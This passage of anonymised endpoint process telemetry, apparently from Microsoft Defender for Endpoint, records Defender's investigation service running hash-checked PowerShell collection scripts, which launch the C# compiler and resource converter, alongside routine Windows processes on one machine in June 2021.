01:14:07.529583300+00:00,12180,2021-06-23 01:14:07.529583300+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,12180,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1323,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:11.508156900+00:00,6652,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\nxiql5fq.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:14:07.529759200+00:00,13496,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '30b414c492214690762cafc1ba95e59a299c41730500525ec203c6400675db50')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:11.568605600+00:00,2021-06-23 01:15:28.391911500+00:00,6d078e17-4306-4fb6-8704-0a04b42ac63d,computerpii_0a470890c60768167990033d701e7bd881398861,157357,False,10.7740.19041.1052,False,11540474045172243,,11540474045172249,2021-06-23 01:14:07.529759200+00:00,13496,2021-06-23 01:14:07.529759200+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,13496,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1324,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:11.553478600+00:00,14308,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\xvs3tacz.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:14:07.529583300+00:00,12180,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '0120d384f04535fd94f1f51e27079149e7251abacda8dd815423efa40cb669d6')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:11.623076500+00:00,2021-06-23 01:15:28.392176700+00:00,e102b6de-fcbd-4a80-af71-27f05acf9277,computerpii_0a470890c60768167990033d701e7bd881398861,157362,False,10.7740.19041.1052,False,11540474045172242,,11540474045172250,2021-06-23 01:14:07.529583300+00:00,12180,2021-06-23 01:14:07.529583300+00:00,powershell.exe,12180,16640,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1325,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:11.592978400+00:00,16408,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\ow43e4io.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:14:07.530807700+00:00,9804,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '06852d31639fc1cf6572dfe7936e881c69e76ebfe676a416734acc00310f9c3d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:11.702550500+00:00,2021-06-23 01:15:28.392272600+00:00,58b00b1d-0179-4937-a47c-e5d042d6bae7,computerpii_0a470890c60768167990033d701e7bd881398861,157364,False,10.7740.19041.1052,False,11540474045172244,,11540474045172251,2021-06-23 01:14:07.530807700+00:00,9804,2021-06-23 01:14:07.530807700+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,9804,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1326,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:11.631583600+00:00,9408,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_2b203146058680051976845e83a0dae867309aa1.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_039c9104d3d25ded09f9e8fada96c8cd96362770.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:14:11.508156900+00:00,6652,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\nxiql5fq.cmdline""",True,2021-06-23 01:14:07.529759200+00:00,13496,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:11.710028800+00:00,2021-06-23 01:15:28.392376500+00:00,3ba768e1-0f64-429f-b34e-3d042684b2d1,computerpii_0a470890c60768167990033d701e7bd881398861,157366,False,10.7740.19041.1052,False,11540474045172249,,11540474045172252,2021-06-23 01:14:11.508156900+00:00,6652,2021-06-23 01:14:11.508156900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,6652,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.205808900+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1327,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:11.653202200+00:00,15256,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_9d52840f5c87b1252a006b35e0d94100d51b97dd.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_50387a0c1bc057fbe3807fcd665d4a07fccf6892.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:14:11.553478600+00:00,14308,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\xvs3tacz.cmdline""",True,2021-06-23 01:14:07.529583300+00:00,12180,powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:11.713538200+00:00,2021-06-23 01:15:28.392427400+00:00,4983a11d-5f5e-466d-bc3c-3280dd03f59a,computerpii_0a470890c60768167990033d701e7bd881398861,157367,False,10.7740.19041.1052,False,11540474045172250,,11540474045172253,2021-06-23 01:14:11.553478600+00:00,14308,2021-06-23 01:14:11.553478600+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,14308,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:14:11.594465+00:00,2019-12-07 09:10:35.992536100+00:00,18688,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1328,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:11.690973100+00:00,18452,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_a89c37e536369d8aeb9a04b1a8f0b016e6c3d098.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_9e530b41aa3f8b3af02c2956b0d2e7346a3bc654.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:14:11.592978400+00:00,16408,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\ow43e4io.cmdline""",True,2021-06-23 01:14:07.530807700+00:00,9804,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:11.718471+00:00,2021-06-23 01:15:28.392478400+00:00,627dade0-65be-434a-87b4-28d5d376987f,computerpii_0a470890c60768167990033d701e7bd881398861,157368,False,10.7740.19041.1052,False,11540474045172251,,11540474045172254,2021-06-23 01:14:11.592978400+00:00,16408,2021-06-23 01:14:11.592978400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,16408,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.205808900+00:00,2019-12-07 09:10:35.992536100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1329,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:11.757596800+00:00,1916,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\tlqsmn3c.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:14:07.529759200+00:00,13496,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '30b414c492214690762cafc1ba95e59a299c41730500525ec203c6400675db50')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:11.877415600+00:00,2021-06-23 01:15:28.392723+00:00,4779cbd4-b078-4ed4-9be0-2e1a46b281b9,computerpii_0a470890c60768167990033d701e7bd881398861,157373,False,10.7740.19041.1052,False,11540474045172243,,11540474045172255,2021-06-23 01:14:07.529759200+00:00,13496,2021-06-23 01:14:07.529759200+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,13496,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1330,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:12.125011100+00:00,3916,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_ddb077d5d85bcdacde0b3e609dc7de98ea843190.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_4e787f7e2bcf0c70807e4f77f59ba706786f100a.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:14:11.757596800+00:00,1916,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\tlqsmn3c.cmdline""",True,2021-06-23 01:14:07.529759200+00:00,13496,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:12.236670400+00:00,2021-06-23 01:15:28.393578200+00:00,2ed518c4-31e0-4502-aca5-7c250c5023d9,computerpii_0a470890c60768167990033d701e7bd881398861,157389,False,10.7740.19041.1052,False,11540474045172255,,11540474045172256,2021-06-23 01:14:11.757596800+00:00,1916,2021-06-23 01:14:11.757596800+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,1916,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.205808900+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1331,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:15:15.229426100+00:00,9236,audiodg.exe,AUDIODG.EXE 0x320 0x494,PortableExecutable,2021-06-09 01:20:34.938090+00:00,C:\Windows\System32\audiodg.exe,585240,fdbb767a71f688e46b329072806eea51,be7b4d24854a80a2cb08f3f7e8c09e3b06c86b420dc867120306aaa6981a40cc,0c81cd20691e99a139c5c6d6e9e35936b0cb02b9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-10 00:46:11.367562+00:00,3752,svchost.exe,svchost.exe -k LocalServiceNetworkRestricted -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:15:15.373315+00:00,2021-06-23 01:15:28.402933400+00:00,6a06d65f-b2fd-4d16-8011-630638f871e1,computerpii_0a470890c60768167990033d701e7bd881398861,157433,False,10.7740.19041.1052,False,11540474045136968,,11540474045172259,2021-06-10 00:46:11.367562+00:00,3752,2021-06-10 00:46:11.367562+00:00,svchost.exe,3752,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,audioadg.exe,audioadg.exe,Windows Audio Device Graph Isolation
+1332,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:15:15.287313400+00:00,19236,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xad3e8055 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:15:15.381540500+00:00,2021-06-23 01:15:28.402983400+00:00,a63efeab-d2b5-4c73-a11e-1b6bbc0776d0,computerpii_0a470890c60768167990033d701e7bd881398861,157434,False,10.7740.19041.1052,False,11540474045171720,,11540474045172260,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft 